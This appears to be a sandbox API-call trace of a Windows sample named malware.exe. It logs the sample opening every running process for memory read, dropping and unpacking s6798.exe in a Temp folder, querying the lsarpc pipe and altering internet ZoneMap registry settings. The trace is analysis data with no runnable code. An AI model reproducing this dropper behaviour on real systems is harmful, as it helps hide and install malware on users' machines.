3288 malware.exe
#264900000
LoadLibrary
lpFileName=Kernel32
Return=7c800000
#265230000
LoadLibrary
lpFileName=C:\WINDOWS\system32\IMM32.DLL
Return=76390000
#266050000
LoadLibrary
lpFileName=gdi32.dll
Return=77f10000
#265770000
LoadLibrary
lpFileName=LPK.DLL
Return=629c0000
#265070000
LoadLibrary
lpFileName=user32
Return=7e410000
#267550000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
Return=0
#268450000
CreateFile
hName=C:\WINDOWS\WindowsShell.Manifest
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=44
#268680000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\SmoothScroll
Return=2
#268690000
RegQueryValue
hKey=HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\EnableBalloonTips
Return=2
#268700000
RegEnumValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\LanguagePack\SURR
Return=0
type=REG_DWORD
data=2
#267820000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#269700000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\SmoothScroll
Return=2
#269700000
LoadLibrary
lpFileName=imm32.dll
Return=76390000
#268890000
LoadLibrary
lpFileName=comctl32.dll
Return=5d090000
#266880000
LoadLibrary
lpFileName=shell32
Return=7c9c0000
#270020000
LoadLibrary
lpFileName=psapi
Return=76bf0000
#270130000
LoadLibrary
lpFileName=advapi32
Return=77dd0000
#270300000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version
Return=0
#270430000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=3c
#270440000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=3c
#272740000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=3c
#273410000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=4
Return=3c
#273440000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=288
Return=3c
#273490000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=396
Return=0
#273530000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=424
Return=3c
#273570000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=488
Return=3c
#273610000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=504
Return=3c
#273660000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=700
Return=3c
#273710000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=780
Return=0
#273740000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=848
Return=3c
#273800000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=992
Return=0
#273830000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=1028
Return=0
#273860000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=1208
Return=3c
#273910000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=1556
Return=3c
#273970000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=1992
Return=3c
#274010000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=2028
Return=3c
#274050000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=2812
Return=3c
#274180000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=2920
Return=0
#274220000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=3036
Return=3c
#274250000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=3184
Return=0
#274290000
OpenProcess
desiredAccess=PROCESS_QUERY_INFORMATION PROCESS_VM_READ 
dwProcessId=3288
Return=3c
#274590000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\\n6798\s6798.exe.zip
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=3c
#274660000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\\n6798\s6798.exe.zip
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=3c
#275670000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\\n6798\s6798.exe
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=48
#290280000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\\n6798\s6798.exe.zip
Return=1
#290700000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CriticalSectionTimeout
Return=0
#290710000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\RWLockResourceTimeOut
Return=2
#290390000
LoadLibrary
lpFileName=ole32.dll
Return=774e0000
#291260000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeManager\Compositing
Return=2
#291280000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\LameButtonText
Return=2
#291290000
LoadLibrary
lpFileName=uxtheme.dll
Return=5ad70000
#292560000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MaximizeApps
Return=2
#292570000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MaximizeApps
Return=2
#292620000
LoadLibrary
lpFileName=netapi32
Return=5b860000
#292820000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\MaxRpcSize
Return=2
#292860000
LoadLibrary
lpFileName=rpcrt4.dll
Return=77e70000
#293010000
CreateFile
hName=\\.\PIPE\wkssvc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=78
#293140000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood
Return=2
#293160000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
Return=2
#293180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
Return=2
#293210000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
Return=2
#293260000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Return=2
#293270000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
Return=2
#293310000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Return=0
#293590000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
Return=0
#293670000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\Controls\SuppressionPolicy
Return=2
#293680000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\Controls
Return=0
#293700000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
Return=2
#293700000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
Return=2
#293710000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\SuppressionPolicy
Return=2
#293720000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
Return=0
#293730000
RegCreateKey
hKey=7c\SessionInfo\0000000000007bb3
Return=0
#293750000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\ShellFolder\WantsParseDisplayName
Return=2
#293780000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11D0-BCED-00A0C90AB50F}\ShellFolder\WantsParseDisplayName
Return=2
#293810000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}\SuppressionPolicy
Return=2
#293820000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
Return=2
#293830000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
Return=2
#293830000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\SuppressionPolicy
Return=2
#293850000
RegCreateKey
hKey=7c\SessionInfo\0000000000007bb3
Return=0
#293870000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
Return=2
#293900000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
Return=2
#293940000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
Return=0
#293980000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Return=0
#294010000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
Return=2
#294060000
RegCreateKey
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
Return=0
#294060000
RegQueryValue
hKey=80\{871C5380-42A0-1069-A2EA-08002B30309D}
Return=2
#294060000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
Return=0
#294070000
RegQueryValue
hKey=84\{871C5380-42A0-1069-A2EA-08002B30309D}
Return=2
#294090000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\EnforceShellExtensionSecurity
Return=2
#294120000
RegCreateKey
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Return=0
#294120000
RegQueryValue
hKey=88\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-
Return=2
#294120000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Return=0
#294130000
RegQueryValue
hKey=8c\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-
Return=0
#294130000
LoadLibrary
lpFileName=appHelp.dll
Return=77b40000
#294370000
LoadLibrary
lpFileName=ole32.dll
Return=774e0000
#294560000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\Com+Enabled
Return=0
#295170000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MinimumFreeMemPercentageToCreateProcess
Return=2
#295180000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MinimumFreeMemPercentageToCreateObject
Return=2
#294560000
LoadLibrary
lpFileName=CLBCATQ.DLL
Return=76fd0000
#295210000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\Com+Enabled
Return=0
#295210000
LoadLibrary
lpFileName=CLBCATQ.DLL
Return=76fd0000
#295560000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\REGDBVersion
Return=0
#295580000
CreateFile
hName=C:\WINDOWS\Registration\R000000000007.clb
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=10c
#295780000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\REGDBVersion
Return=0
#295880000
RegQueryValue
hKey=9e\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InprocServer32\InprocServer32
Return=2
#295930000
RegQueryValue
hKey=9e\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InprocServer32
Return=0
#296120000
RegQueryValue
hKey=9e\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\AppID
Return=2
#296240000
RegQueryValue
hKey=9e\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InprocServer32\ThreadingModel
Return=0
#299030000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#300260000
LoadLibrary
lpFileName=kernel32.dll
Return=7c800000
#300900000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#303650000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#304120000
RegCreateKey
hKey=HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Return=0
#304200000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP\LdapClientIntegrity
Return=0
#304230000
LoadLibrary
lpFileName=Comctl32.dll
Return=773d0000
#304490000
LoadLibrary
lpFileName=RichEd20.dll
Return=74e30000
#304960000
LoadLibrary
lpFileName=Comctl32.dll
Return=773d0000
#305430000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#305750000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Interface\{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\Typelib
Return=0
#305790000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Interface\{b722bccb-4e68-101b-a2bc-00aa00404770}\ProxyStubClsid32
Return=0
#305820000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Interface\{79eac9c4-baf9-11ce-8c82-00aa004ba90b}\ProxyStubClsid32
Return=0
#305860000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Interface\{000214E6-0000-0000-C000-000000000046}\ProxyStubClsid32
Return=0
#305900000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Interface\{93F2F68C-1D1B-11D3-A30E-00C04F79ABD1}\ProxyStubClsid32
Return=0
#305980000
LoadLibrary
lpFileName=SHELL32.dll
Return=7c9c0000
#306210000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}\ShellFolder\WantsParseDisplayName
Return=2
#306240000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsParseDisplayName
Return=2
#306270000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsParseDisplayName
Return=2
#306310000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{E17D4FC0-5564-11D1-83F2-00A0C90DC849}\ShellFolder\WantsParseDisplayName
Return=2
#306330000
RegEnumValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{AEB6717E-7E19-11d0
Return=0
#306350000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\InProcServer32
Return=0
#306360000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\InProcServer32\LoadWithoutCOM
Return=2
#306670000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
Return=0
#306680000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\WPA\PnP\seed
Return=0
#306680000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\OsLoaderPath
Return=0
#306680000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\OsLoaderPath
Return=0
#306680000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
Return=0
#306690000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
Return=0
#306710000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
Return=0
#306710000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
Return=0
#306720000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackSourcePath
Return=0
#306720000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackSourcePath
Return=0
#306720000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackCachePath
Return=2
#306730000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\DriverCachePath
Return=0
#306730000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\DriverCachePath
Return=0
#306750000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath
Return=0
#306770000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\LogLevel
Return=2
#306770000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\LogPath
Return=2
#306390000
LoadLibrary
lpFileName=SETUPAPI.dll
Return=77920000
#306910000
CreateFile
hName=\\.\PIPE\lsarpc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=158
#307010000
CreateFile
hName=\\.\PIPE\lsarpc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=154
#307210000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=15c
#307240000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4774220e-1640-11e4-bb1b-806d6172696f}\\Data
Return=0
#307250000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4774220e-1640-11e4-bb1b-806d6172696f}\\Generation
Return=0
#307280000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=15c
#307300000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Data
Return=0
#307310000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#307330000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=15c
#307340000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=15c
#307360000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6fc0686a-6791-11e1-b81a-806d6172696f}\
Return=0
#307360000
RegSetValue
hKey=15c\BaseClass
type=REG_SZ
data=Drive
Return=0
#307370000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=15c
#307380000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=15c
#307390000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4774220e-1640-11e4-bb1b-806d6172696f}\
Return=0
#307400000
RegSetValue
hKey=15c\BaseClass
type=REG_SZ
data=Drive
Return=0
#307410000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#307540000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.exe
Return=0
#307580000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.asp
Return=0
#307600000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.bat
Return=0
#307620000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.cer
Return=0
#307640000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.chm
Return=0
#307660000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.cmd
Return=0
#307680000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.com
Return=0
#307690000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.cpl
Return=0
#307710000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.crt
Return=0
#307740000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\REGDBVersion
Return=0
#307780000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\REGDBVersion
Return=0
#307850000
RegQueryValue
hKey=9e\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32\InprocServer32
Return=2
#307900000
RegQueryValue
hKey=9e\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32
Return=0
#307970000
RegQueryValue
hKey=9e\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\AppID
Return=2
#308030000
RegQueryValue
hKey=9e\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32\ThreadingModel
Return=0
#309180000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#309480000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck
Return=2
#309550000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OBJECT_CACHING\malware.exe
Return=2
#309550000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OBJECT_CACHING\*
Return=2
#309560000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\malware.exe
Return=2
#309560000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\*
Return=2
#309560000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\malware.exe
Return=2
#309560000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\*
Return=2
#309570000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING\malware.exe
Return=2
#309570000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING\*
Return=2
#309580000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WINDOW_RESTRICTIONS\malware.exe
Return=2
#309580000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WINDOW_RESTRICTIONS\*
Return=2
#309590000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT\malware.exe
Return=2
#309590000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT\*
Return=2
#309590000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS\malware.exe
Return=2
#309600000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS\*
Return=0
#309600000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL\malware.exe
Return=2
#309600000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL\*
Return=0
#309610000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\malware.exe
Return=2
#309610000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
Return=2
#309610000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\malware.exe
Return=2
#309620000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
Return=2
#309640000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\malware.exe
Return=2
#309640000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
Return=2
#309650000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\malware.exe
Return=2
#309650000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\*
Return=2
#309690000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InProcServer32
Return=0
#310020000
LoadLibrary
lpFileName=Secur32.dll
Return=77fe0000
#310110000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
Return=0
#310210000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
Return=0
#310260000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
Return=0
#310270000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass
type=REG_DWORD
data=1
Return=0
#310270000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName
type=REG_DWORD
data=1
Return=0
#310270000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet
type=REG_DWORD
data=1
Return=0
#310320000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
Return=0
#310370000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
Return=0
#310420000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
Return=0
